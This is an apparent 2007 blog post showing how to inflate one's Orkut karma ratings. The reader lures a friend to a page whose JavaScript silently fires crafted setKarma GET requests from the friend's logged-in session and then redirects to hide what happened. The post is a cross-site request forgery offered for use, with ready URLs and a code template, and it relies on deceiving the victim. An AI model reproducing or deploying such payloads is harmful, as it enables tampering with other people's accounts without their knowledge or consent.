Friday, August 17, 2007

Increasing the karma ratings on Orkut

Trace Back
Followed from : Making more fans on Orkut

Continued ...
"http://www.orkut.com/setKarma?cat=0&val=1&gid=FR[friends id here]/[your id here]"
Eg: "http://www.orkut.com/setKarma? cat=0&val=1&gid=FRUS00000000000/US00123456789"

The above illustrates the page you have to make your friend to access to make he/she your fan.

The same can be modified to increase (can decrease also) your cool, sexy and trusty karma ratings. The cat=0 in the URL specifies the fan function.

cat=1 : stands for trusty rating.
cat=2 : stands for cool rating.
cat=3 : stands for sexy rating.

The next GET parameter val=1 has to be modified as :
val = 0: for 0 rating
val = 1: for 1
val = 2: for 2
val = 3: for full rating.

So our final URL for full trusty rating is :
"http://www.orkut.com/setKarma?cat=1&val=3&gid=FR[friends id here]/[your id here]"
Eg: "http://www.orkut.com/setKarma? cat=1&val=3&gid=FRUS00000000000/US00123456789"

for Cool rating :
"http://www.orkut.com/setKarma?cat=2&val=3&gid=FR[friends id here]/[your id here]"
Eg: "http://www.orkut.com/setKarma? cat=2&val=3&gid=FRUS00000000000/US00123456789"

for Sexy rating :
"http://www.orkut.com/setKarma?cat=3&val=3&gid=FR[friends id here]/[your id here]"
Eg: "http://www.orkut.com/setKarma? cat=3&val=3&gid=FRUS00000000000/US00123456789"

When you are giving all these three in the same page, the 3 get requests must not be sent to the server together. Leave a time delay of about 100ms between each of the GET requests.
You can accomplish this in javascript by the following this template:


function fn(index)
{
var links=new Array("Link 1 for cool/trusty/sexy/fan", "etc fill in");
var i= new Image();
i.src = links[index];
if(index != Count)
{
window.setTimeout("fn("+(index+1)+")",100);
}
else
window.location = "Somewhere"; //Redirect to a nice page.
}



Hope this works for you ....

Did it work ?
Please leave a feedback or comment about other problems you faced ...
Keep orkutting ....

No comments: